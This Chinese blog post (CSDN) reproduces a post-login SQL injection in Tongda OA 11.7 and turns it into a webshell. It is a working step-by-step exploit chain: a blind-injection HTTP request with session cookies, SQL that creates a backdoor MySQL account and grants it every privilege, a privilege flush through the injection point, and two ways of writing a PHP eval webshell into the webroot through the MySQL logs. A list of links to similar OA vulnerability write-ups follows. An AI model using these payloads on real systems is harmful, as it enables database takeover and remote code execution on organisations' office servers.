通过oa后台入侵mysql_通达OA 11.7 后台sql注入getshell漏洞复现

最新推荐文章于 2024-07-10 08:07:26 发布
最新推荐文章于 2024-07-10 08:07:26 发布
阅读量176 收藏
点赞数
文章标签: 通过oa后台入侵mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39779530/article/details/113476846
版权
本文详细介绍了通达OA 11.7版本的一个后台SQL注入漏洞,包括漏洞描述、影响版本、复现步骤。通过布尔盲注找到注入点,利用该漏洞创建新用户并赋予高权限,最终实现getshell。
摘要由CSDN通过智能技术生成

通达OA 11.7 后台sql注入漏洞复现

一、漏洞描述

通达OA 11.7存在sql注入

二、漏洞影响版本

通达oa 11.7

利用条件:需要账号登录

三、漏洞复现

1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装

2、condition_cascade参数存在布尔盲注

POC:

GET /general/hr/manage/query/delete_cascade.php?condition_cascade=select if((substr(user(),1,1)='r'),1,power(9999,99)) HTTP/1.1Host:192.168.77.137User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept:*/*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3X-Requested-With: XMLHttpRequest

Referer: http://192.168.77.137/general/index.php?isIE=0&modify_pwd=0

Cookie: PHPSESSID=ebpjtm5tqh5tvida5keba73fr0; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c71fa06d

DNT:1Connection: close

3、经过测试,过滤了一些函数(sleep、报错的函数等等),各种注释,使用payload:select if((1=1),1,power(9999,99))、select if((1=2),1,power(9999,99)),判断注入点 #当字符相等时,不报错,错误时报错

af3e265075a99a26bb88410041e42acf.png

7fc575c5a369e29cd2715040e1f92fe3.png

4、通过添加用户at666,密码为abcABC@123

grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

678ad744fec2d916d923327b306a336d.png

5、使用Navicat Premium连接数据库

6b1bc7af455fec1b344271adb0a81c74.png

6、添加的账户不能直接通过日志慢查询写入文件,需要给创建的账户添加权限

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));

75f464355a6f3753a06c3fb6b936ae71.png

7、然后用注入点刷新权限,因为该用户是没有刷新权限的权限的

general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

94e1efebe1dde19a68f07528c78774b1.png

8、再次登录,提示密码过期,需要重新执行grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

a6e9d8b87c24957969a8464e96ff5673.png

fd6715333c1ebd51f2288474dfb29368.png

9、然后写shell

方法一:

select @@basedir;

set global slow_query_log=on;

set global slow_query_log_file='C:/tongda11.7/webroot/test.php';

select '<?php eval($_POST[x]);?>' or sleep(11);

方法二:

select @@basedir;

set global general_log = on;

set global general_log_file ='C:/tongda11.7/webroot/test2.php';

select '<?php eval($_POST[test2]);?>';

show variables like '%general%';

9b101fb323fe3b7c642dd4439d1f7d8c.png

dc622c34e7e096030a5dbd1e5a7e2c5f.png

10、菜刀连接

75374def8d9e868eb054d5b1d5d9d178.png

--------------------------------------------------------------------------------------------

参考:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

weixin_39779530
关注
广联达OA GetIMDictionarySQL注入漏洞
xiaokp7的博客
09-13 292
广联达办公OA(Office Automation)是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。由于广联达 Linkworks办公OA GetIMDictionary接口未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
漏洞复现-通达OA通达OA get_datas 存在前台SQL注入漏洞
xiaokp7的博客
02-18 569
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA get_datas 存在前台SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
通达OA SQL注入漏洞【CVE-2023-4166】
holyxp的博客
08-10 4980
通达OA系统,即Offic Anywhere,又称为网络智能办公系统,是通达科技公司针对各行业办公与管理开发的办公应用系统。通达OA系统采用领先的B/S架构,采用基于WEB网络的开发方式,能够使得企业及个人办公不再受地域限制,实现信息化、自动化、移动化高效便捷办公。漏洞2(CVE-2023-4166)general/system/seal_manage/dianju/delete_log.php文件,对参数 DELETE_STR 的操作会导致 sql 注入。
广联达办公OA-SQL注入漏洞
m0_49025459的博客
08-29 648
该文章来自,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
通达OA query.php SQL注入漏洞
Keepb1ue的博客
04-28 845
通达OA(Office Automation)是一款企业级协同办公软件,旨在为企业提供高效、便捷、安全、可控的办公环境。它涵盖了企业日常办公所需的各项功能,包括人事管理、财务管理、采购管理、销售管理、库存管理、生产管理、办公自动化等。通达OA支持PC端和移动端使用,可以实现随时随地办公,提高工作效率和协作能力。同时,它还具备高度可定制性和扩展性,可以根据企业的实际需求进行定制开发,满足企业的个性化需求。通达OA广泛应用于各类企业,帮助企业实现数字化转型,提高管理效率和竞争力。
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞 SQL 注入漏洞是指攻击者通过构造...
漏洞复现通达OA v11.6 report_bi.func.php SQL注入漏洞
最新发布
alert['Hello World']
07-10 1114
通达OA v11.6 report_bi.func.php 存在SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
通达OA v11.6 insert SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA sql注入漏洞.zip
08-24
已实现漏洞验证脚本
2022-10-10(通达OA SQL注入漏洞)
qq_45751902的博客
10-10 2082
经过测试发现过滤了单引号,对r字符进行转换成16进制,通过手工最终获得数据库用户名root。使用手工注入,经过测试发现过滤了单引号,对r字符进行转换成16进制(用户名是root)首先创建一个普通账户 lisi:lisi123456。中存在 一个$_GET[“id”];参数位置:SORT_ID,FILE_SORT。发现时间明显变长了,再此证明id没有被过滤。登录账号是admin,密码为空。利用条件:一枚普通账号登录权限。利用条件:11.5版本无需登录。
漏洞复现】用友 UFIDA saveDoc.ajax 任意文件上传漏洞
alert['Hello World']
06-26 1373
用友 UFIDA saveDoc.ajax接口存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
漏洞复现】广联达 Linkworks办公OA SQL注入
zkaqlaoniao的博客
10-27 727
广联达办公OA是一款综合办公自动化解决方案,旨在提高组织内部的工作效率和协作能力。它提供了一系列功能和工具,帮助企业管理和处理日常办公任务、流程和文档。
win server 2012 使用Navicat for mysql 链接不了本地的mysql数据库,提示10038 或 0
11-14 1383
找到C:/Windows/System32/Drivers/etc文件夹; 编辑hosts文件, 将127.0.0.1前面的#号去掉即可。
通达OA 2015版使用PHP调试连接SQL server数据库(图文)
小飞鱼通达 二开
08-31 3472
通达OA升级到2015版后,系统使用的PHP版本变为5.3,而PHP从5.3版本开始默认不支持SQL server,这给通达的粉丝们带来了一些麻烦。经过检查配置文件php.ini发现默认系统中已配置支持sqlserver,并且在对应目录下也存放了连接sqlserver使用的dll文件,看来这个工作通达已经做好了。既然已经配置可以,那就直接开工吧,写一个连接数据的文件测试一下,由于版本升级后数据库的
mysql使用navicat给指定用户授权查看数据库中的某些数据表
04-27 9991
mysql使用navicat给指定用户授权查看数据库中的某些数据表
广联达OA前台sql注入+后台文件上传漏洞复现分析
博客地址 www.sec0nd.top
08-15 2704
广联达OA前台sql注入+后台文件上传漏洞复现分析
通达OA 11.5 sql注入漏洞复现
weixin_45291045的博客
02-13 591
下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe 1.登录一个账户 2.构造url http://192.168.1.1general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2,burp抓包 id参数存在延时注入 直接复制数据包,id参数加个*保存到sqlmap跑 python sqlmap.py -r 1.txt orderby参数 构
通达OA v11.5 swfupload_new.php关键漏洞SQL注入威胁与利用
"通达OA v11.5的swfupload_new.php文件存在一个严重的SQL注入漏洞。这个漏洞存在于系统的上传功能中,攻击者能够利用它对服务器上的数据库执行恶意SQL命令,从而可能获取到敏感信息。漏洞的存在对通达OAv11.5版本的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值